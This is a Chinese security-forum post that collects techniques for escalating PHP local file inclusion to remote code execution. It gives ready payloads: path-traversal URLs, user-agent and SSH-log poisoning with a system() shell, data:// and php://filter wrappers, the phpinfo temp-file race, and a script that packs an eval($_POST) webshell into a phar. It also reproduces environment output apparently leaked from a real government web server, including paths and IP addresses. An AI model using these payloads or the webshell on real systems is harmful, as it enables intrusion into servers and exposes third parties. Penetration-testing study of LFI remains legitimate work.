最近lfi+phpinfo利用挺火的,我又在知识库里搜了一下,文件包含的文章不少,但是对于lfi的总结文章还没有。于是总结一下,部分翻译自老外文章,自带一点自己的理解和部分老外没提及到的知识点。此外还整理里一篇lfi转换为rce可能用到的协议

Lfi如果没有上传点的话,在很多人眼里如同鸡肋,食之无味弃之可惜。其实网上已经有很多方法把lfi转化成为rce。

  • 通过/proc/self/environ

首先确定一个存在lfi的点,然后用来包含/proc/self/environ

http://192.168.159.128/lfi.php?file=../../../../../../../../proc/self/environ

你如果看到

DOCUMENT_ROOT=/home/dprdicom/public_html/smscenterGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip,

deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=smscenter.dprdbekasikota.go.idHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101

Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/dprdicom/public_html/smscenter/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN=

_NAME=smscenter.dprdbekasikota.go.idSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAAa

和上面这种类似的内容。就证明可以利用。

注意这段内容中:

HTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0

这段就是浏览器的ua标识,也是我们可控的一个内容之一。我们要做的就是把ua改成php代码。然后利用上面的lfi点包含进来,就会执行php代码,从而实现rce

  • 通过ssh日志

如果目标机开启了ssh,可以通过包含ssh日志的方式来getshell,ssh日志默认保存位置:/var/log/auth.log  当我们连接ssh时输入Ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105  php代码便会保存在/var/log/auth.log中,然后我们使用lfi.php进行包含。http://192.168.159.128/lfi.php?file=../../../../../../../..//var/log/auth.log

此外还能包含的日志文件有/var/www/apachae2/access.log (通过ua控制)

附一个fuzz的文件列表:点我查看

  • 通过php://filter

【利用场景】:lfi无法截断要包含的文件

php://filter是一种元封装器,用于”数据流打开”时的”筛选过滤”应用。在有了lfi的时候,可以利用这个功能来进行文件读写,注意,读文件的时候一定要进行base64编码,因为如果不进行编码的话php代码有可能直接执行,导致看不到代码。

读文件

http://192.168.159.128/lfi.php?file=php://filter/read=convert.base64-encode/resource=zh.php

读到的内容是base64编码的,去解下码就能直接看到文件源代码。

  • 通过data://伪协议

利用data://伪协议

进行代码执行的思路原理和php://是类似的,都是利用了PHP中的流的概念,将原本的include的文件流重定向到了用户可控制的输入流中。

http://127.0.0.1/lfi.php?file=data://text/plain;base64,PD9waHBpbmZvKCk7

PD9waHBpbmZvKCk7解码之后是<?phpinfo();

成功执行phpinfo()

  • 通过php://input

【条件】在allow_url_include = On 且 PHP >= 5.2.0

原理和上面差不多。这个点曾经在强网杯中出现过

  • lfi+phpinfo

【条件】lfi+phpinfo

Lfi+phpinfo需要你有一个lfi,并且在网站上找到了phpinfo.php

http://drops.wooyun.org/web/13249 原理看这个

向服务器上任意php文件post请求上传文件时,都会生成临时文件,可以直接在phpinfo页面找到临时文件的路径及名字。在文件上传完毕后会自动删除临时文件,我们可以在删除之前包含临时文件,从而生成我们的shell

把下面这个图片保存成rar解压后可以看到源码。

  • include ‘$a’.php

当无法截断时可以利用phar包含,但是需要一个上传点

Phar打包 需要phar_readonly为off在php.ini中修改

<?php

try{

    $p = new Phar("my.phar", 0, 'my.phar');

} catch (UnexpectedValueException $e) {

    die('Could not open my.phar');

} catch (BadMethodCallException $e) {

    echo 'technically, this cannot happen';

}

$p->startBuffering();

$p['file1.txt'] = 'file1';

$p['file2.txt'] = 'file2';

$p['file3.txt'] = 'file3';

$p['shell.php'] = '<?php phpinfo(); eval($_POST[x]); ?>';

// use my.phar

echo file_get_contents('phar://my.phar/file2.txt');  // echo file2

// make a file named my.phar

$p->setStub("<?php

    Phar::mapPhar('myphar.phar');  

__HALT_COMPILER();");

$p->stopBuffering();

?>

Phar可以改成任意后缀。上传后利用

http://localhost/pentest/web200/upload.php?file=phar://S9EvthZuJI1TC4u5.txt/shell

或者尝试利用file://加路径去读php代码

  • data协议(可用于无法截断.php的情况)

http://127.0.0.1/test/filter.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

  • 结语

Lfi目前已经有了很多种转化成rce的办法,慢慢尝试,总会找到一种把鸡肋优雅的利用的办法。

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖